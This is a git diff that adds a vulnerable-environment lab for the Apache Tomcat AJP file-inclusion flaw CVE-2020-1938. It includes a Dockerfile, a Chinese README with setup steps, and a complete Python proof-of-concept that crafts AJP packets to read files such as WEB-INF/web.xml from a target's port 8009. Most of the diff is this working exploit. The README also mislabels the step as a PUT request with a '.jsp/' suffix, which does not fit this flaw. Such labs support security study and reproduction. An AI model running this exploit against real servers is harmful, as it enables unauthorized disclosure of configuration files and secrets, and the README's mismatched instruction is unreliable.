diff --git a/t/tomcat/2/Dockerfile b/t/tomcat/2/Dockerfile new file mode 100644 index 0000000..96f6638 --- /dev/null +++ b/t/tomcat/2/Dockerfile @@ -0,0 +1,3 @@ +FROM tomcat:8.5.32 + +EXPOSE 8080 \ No newline at end of file diff --git a/t/tomcat/2/README.md b/t/tomcat/2/README.md new file mode 100644 index 0000000..6d0cf82 --- /dev/null +++ b/t/tomcat/2/README.md @@ -0,0 +1,39 @@ +## Tomcat Apache Tomcat 文件包含漏洞(CVE-2020-1938) + +### 漏洞信息 + + * [Fixed in Apache Tomcat 8.5.51](https://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.51) + * [【威胁通告】Apache Tomcat 文件包含漏洞(CVE-2020-1938)](http://blog.nsfocus.net/cve-2020-1938/) + +### 获取环境: + +1. 拉取镜像到本地 + + ``` +$ docker pull medicean/vulapps:t_tomcat_2 + ``` + +2. 启动环境 + + ``` +$ docker run -d -p 8080:8080 medicean/vulapps:t_tomcat_2 + ``` + > `-p 8080:8080` 前面的 8080 代表物理机的端口,可随意指定。 + +### 使用与利用 + +访问 `http://你的 IP 地址:端口号/` + +#### PoC + +1. 向目标发起 PUT 请求,注意后缀为 `.jsp/` + +``` +python poc.py 127.0.0.1 -p 8009 -f WEB-INF/web.xml +``` + +> POC来源:[https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi](https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi) +### 参考链接 + +* [Apache-Tomcat-Ajp漏洞(CVE-2020-1938)漏洞复现(含有poc)](https://www.cnblogs.com/L0ading/p/12341112.html) +* [Apache-Tomcat-Ajp漏洞(CVE-2020-1938)漏洞复现](https://www.liuyixiang.com/post/109123.html) diff --git a/t/tomcat/2/poc.py b/t/tomcat/2/poc.py new file mode 100644 index 0000000..630a581 --- /dev/null +++ b/t/tomcat/2/poc.py @@ -0,0 +1,302 @@ +#!/usr/bin/env python +#CNVD-2020-10487 Tomcat-Ajp lfi +#by ydhcui +import struct + +# Some references: +# https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html +def pack_string(s): + if s is None: + return struct.pack(">h", -1) + l = len(s) + return struct.pack(">H%dsb" % l, l, s.encode('utf8'), 0) +def unpack(stream, fmt): + size = struct.calcsize(fmt) + buf = stream.read(size) + return struct.unpack(fmt, buf) +def unpack_string(stream): + size, = unpack(stream, ">h") + if size == -1: # null string + return None + res, = unpack(stream, "%ds" % size) + stream.read(1) # \0 + return res +class NotFoundException(Exception): + pass +class AjpBodyRequest(object): + # server == web server, container == servlet + SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2) + MAX_REQUEST_LENGTH = 8186 + def __init__(self, data_stream, data_len, data_direction=None): + self.data_stream = data_stream + self.data_len = data_len + self.data_direction = data_direction + def serialize(self): + data = self.data_stream.read(AjpBodyRequest.MAX_REQUEST_LENGTH) + if len(data) == 0: + return struct.pack(">bbH", 0x12, 0x34, 0x00) + else: + res = struct.pack(">H", len(data)) + res += data + if self.data_direction == AjpBodyRequest.SERVER_TO_CONTAINER: + header = struct.pack(">bbH", 0x12, 0x34, len(res)) + else: + header = struct.pack(">bbH", 0x41, 0x42, len(res)) + return header + res + def send_and_receive(self, socket, stream): + while True: + data = self.serialize() + socket.send(data) + r = AjpResponse.receive(stream) + while r.prefix_code != AjpResponse.GET_BODY_CHUNK and r.prefix_code != AjpResponse.SEND_HEADERS: + r = AjpResponse.receive(stream) + + if r.prefix_code == AjpResponse.SEND_HEADERS or len(data) == 4: + break +class AjpForwardRequest(object): + _, OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, ACL, REPORT, VERSION_CONTROL, CHECKIN, CHECKOUT, UNCHECKOUT, SEARCH, MKWORKSPACE, UPDATE, LABEL, MERGE, BASELINE_CONTROL, MKACTIVITY = range(28) + REQUEST_METHODS = {'GET': GET, 'POST': POST, 'HEAD': HEAD, 'OPTIONS': OPTIONS, 'PUT': PUT, 'DELETE': DELETE, 'TRACE': TRACE} + # server == web server, container == servlet + SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2) + COMMON_HEADERS = ["SC_REQ_ACCEPT", + "SC_REQ_ACCEPT_CHARSET", "SC_REQ_ACCEPT_ENCODING", "SC_REQ_ACCEPT_LANGUAGE", "SC_REQ_AUTHORIZATION", + "SC_REQ_CONNECTION", "SC_REQ_CONTENT_TYPE", "SC_REQ_CONTENT_LENGTH", "SC_REQ_COOKIE", "SC_REQ_COOKIE2", + "SC_REQ_HOST", "SC_REQ_PRAGMA", "SC_REQ_REFERER", "SC_REQ_USER_AGENT" + ] + ATTRIBUTES = ["context", "servlet_path", "remote_user", "auth_type", "query_string", "route", "ssl_cert", "ssl_cipher", "ssl_session", "req_attribute", "ssl_key_size", "secret", "stored_method"] + def __init__(self, data_direction=None): + self.prefix_code = 0x02 + self.method = None + self.protocol = None + self.req_uri = None + self.remote_addr = None + self.remote_host = None + self.server_name = None + self.server_port = None + self.is_ssl = None + self.num_headers = None + self.request_headers = None + self.attributes = None + self.data_direction = data_direction + def pack_headers(self): + self.num_headers = len(self.request_headers) + res = "" + res = struct.pack(">h", self.num_headers) + for h_name in self.request_headers: + if h_name.startswith("SC_REQ"): + code = AjpForwardRequest.COMMON_HEADERS.index(h_name) + 1 + res += struct.pack("BB", 0xA0, code) + else: + res += pack_string(h_name) + + res += pack_string(self.request_headers[h_name]) + return res + + def pack_attributes(self): + res = b"" + for attr in self.attributes: + a_name = attr['name'] + code = AjpForwardRequest.ATTRIBUTES.index(a_name) + 1 + res += struct.pack("b", code) + if a_name == "req_attribute": + aa_name, a_value = attr['value'] + res += pack_string(aa_name) + res += pack_string(a_value) + else: + res += pack_string(attr['value']) + res += struct.pack("B", 0xFF) + return res + def serialize(self): + res = "" + res = struct.pack("bb", self.prefix_code, self.method) + res += pack_string(self.protocol) + res += pack_string(self.req_uri) + res += pack_string(self.remote_addr) + res += pack_string(self.remote_host) + res += pack_string(self.server_name) + res += struct.pack(">h", self.server_port) + res += struct.pack("?", self.is_ssl) + res += self.pack_headers() + res += self.pack_attributes() + if self.data_direction == AjpForwardRequest.SERVER_TO_CONTAINER: + header = struct.pack(">bbh", 0x12, 0x34, len(res)) + else: + header = struct.pack(">bbh", 0x41, 0x42, len(res)) + return header + res + def parse(self, raw_packet): + stream = StringIO(raw_packet) + self.magic1, self.magic2, data_len = unpack(stream, "bbH") + self.prefix_code, self.method = unpack(stream, "bb") + self.protocol = unpack_string(stream) + self.req_uri = unpack_string(stream) + self.remote_addr = unpack_string(stream) + self.remote_host = unpack_string(stream) + self.server_name = unpack_string(stream) + self.server_port = unpack(stream, ">h") + self.is_ssl = unpack(stream, "?") + self.num_headers, = unpack(stream, ">H") + self.request_headers = {} + for i in range(self.num_headers): + code, = unpack(stream, ">H") + if code > 0xA000: + h_name = AjpForwardRequest.COMMON_HEADERS[code - 0xA001] + else: + h_name = unpack(stream, "%ds" % code) + stream.read(1) # \0 + h_value = unpack_string(stream) + self.request_headers[h_name] = h_value + def send_and_receive(self, socket, stream, save_cookies=False): + res = [] + i = socket.sendall(self.serialize()) + if self.method == AjpForwardRequest.POST: + return res + + r = AjpResponse.receive(stream) + assert r.prefix_code == AjpResponse.SEND_HEADERS + res.append(r) + if save_cookies and 'Set-Cookie' in r.response_headers: + self.headers['SC_REQ_COOKIE'] = r.response_headers['Set-Cookie'] + + # read body chunks and end response packets + while True: + r = AjpResponse.receive(stream) + res.append(r) + if r.prefix_code == AjpResponse.END_RESPONSE: + break + elif r.prefix_code == AjpResponse.SEND_BODY_CHUNK: + continue + else: + raise NotImplementedError + break + + return res + +class AjpResponse(object): + _,_,_,SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE, GET_BODY_CHUNK = range(7) + COMMON_SEND_HEADERS = [ + "Content-Type", "Content-Language", "Content-Length", "Date", "Last-Modified", + "Location", "Set-Cookie", "Set-Cookie2", "Servlet-Engine", "Status", "WWW-Authenticate" + ] + def parse(self, stream): + # read headers + self.magic, self.data_length, self.prefix_code = unpack(stream, ">HHb") + + if self.prefix_code == AjpResponse.SEND_HEADERS: + self.parse_send_headers(stream) + elif self.prefix_code == AjpResponse.SEND_BODY_CHUNK: + self.parse_send_body_chunk(stream) + elif self.prefix_code == AjpResponse.END_RESPONSE: + self.parse_end_response(stream) + elif self.prefix_code == AjpResponse.GET_BODY_CHUNK: + self.parse_get_body_chunk(stream) + else: + raise NotImplementedError + + def parse_send_headers(self, stream): + self.http_status_code, = unpack(stream, ">H") + self.http_status_msg = unpack_string(stream) + self.num_headers, = unpack(stream, ">H") + self.response_headers = {} + for i in range(self.num_headers): + code, = unpack(stream, ">H") + if code <= 0xA000: # custom header + h_name, = unpack(stream, "%ds" % code) + stream.read(1) # \0 + h_value = unpack_string(stream) + else: + h_name = AjpResponse.COMMON_SEND_HEADERS[code-0xA001] + h_value = unpack_string(stream) + self.response_headers[h_name] = h_value + + def parse_send_body_chunk(self, stream): + self.data_length, = unpack(stream, ">H") + self.data = stream.read(self.data_length+1) + + def parse_end_response(self, stream): + self.reuse, = unpack(stream, "b") + + def parse_get_body_chunk(self, stream): + rlen, = unpack(stream, ">H") + return rlen + + @staticmethod + def receive(stream): + r = AjpResponse() + r.parse(stream) + return r + +import socket + +def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET): + fr = AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER) + fr.method = method + fr.protocol = "HTTP/1.1" + fr.req_uri = req_uri + fr.remote_addr = target_host + fr.remote_host = None + fr.server_name = target_host + fr.server_port = 80 + fr.request_headers = { + 'SC_REQ_ACCEPT': 'text/html', + 'SC_REQ_CONNECTION': 'keep-alive', + 'SC_REQ_CONTENT_LENGTH': '0', + 'SC_REQ_HOST': target_host, + 'SC_REQ_USER_AGENT': 'Mozilla', + 'Accept-Encoding': 'gzip, deflate, sdch', + 'Accept-Language': 'en-US,en;q=0.5', + 'Upgrade-Insecure-Requests': '1', + 'Cache-Control': 'max-age=0' + } + fr.is_ssl = False + fr.attributes = [] + return fr + +class Tomcat(object): + def __init__(self, target_host, target_port): + self.target_host = target_host + self.target_port = target_port + + self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + self.socket.connect((target_host, target_port)) + self.stream = self.socket.makefile("rb", bufsize=0) + + def perform_request(self, req_uri, headers={}, method='GET', user=None, password=None, attributes=[]): + self.req_uri = req_uri + self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri, method=AjpForwardRequest.REQUEST_METHODS.get(method)) + print("Getting resource at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri)) + if user is not None and password is not None: + self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + ("%s:%s" % (user, password)).encode('base64').replace('\n', '') + for h in headers: + self.forward_request.request_headers[h] = headers[h] + for a in attributes: + self.forward_request.attributes.append(a) + responses = self.forward_request.send_and_receive(self.socket, self.stream) + if len(responses) == 0: + return None, None + snd_hdrs_res = responses[0] + data_res = responses[1:-1] + if len(data_res) == 0: + print("No data in response. Headers:%s\n" % snd_hdrs_res.response_headers) + return snd_hdrs_res, data_res + +''' +javax.servlet.include.request_uri +javax.servlet.include.path_info +javax.servlet.include.servlet_path +''' + +import argparse +parser = argparse.ArgumentParser() +parser.add_argument("target", type=str, help="Hostname or IP to attack") +parser.add_argument('-p', '--port', type=int, default=8009, help="AJP port to attack (default is 8009)") +parser.add_argument("-f", '--file', type=str, default='WEB-INF/web.xml', help="file path :(WEB-INF/web.xml)") +args = parser.parse_args() +t = Tomcat(args.target, args.port) +_,data = t.perform_request('/asdf',attributes=[ + {'name':'req_attribute','value':['javax.servlet.include.request_uri','/']}, + {'name':'req_attribute','value':['javax.servlet.include.path_info',args.file]}, + {'name':'req_attribute','value':['javax.servlet.include.servlet_path','/']}, + ]) +print('----------------------------') +print("".join([d.data for d in data])) diff --git a/t/tomcat/README.md b/t/tomcat/README.md index 0c5f416..dd97b24 100644 --- a/t/tomcat/README.md +++ b/t/tomcat/README.md @@ -2,3 +2,4 @@ Tomcat --- * [Tomcat 远程代码执行漏洞 (CVE-2017-12615)](./1/) +* [Tomcat Apache Tomcat 文件包含漏洞(CVE-2020-1938)](./2/)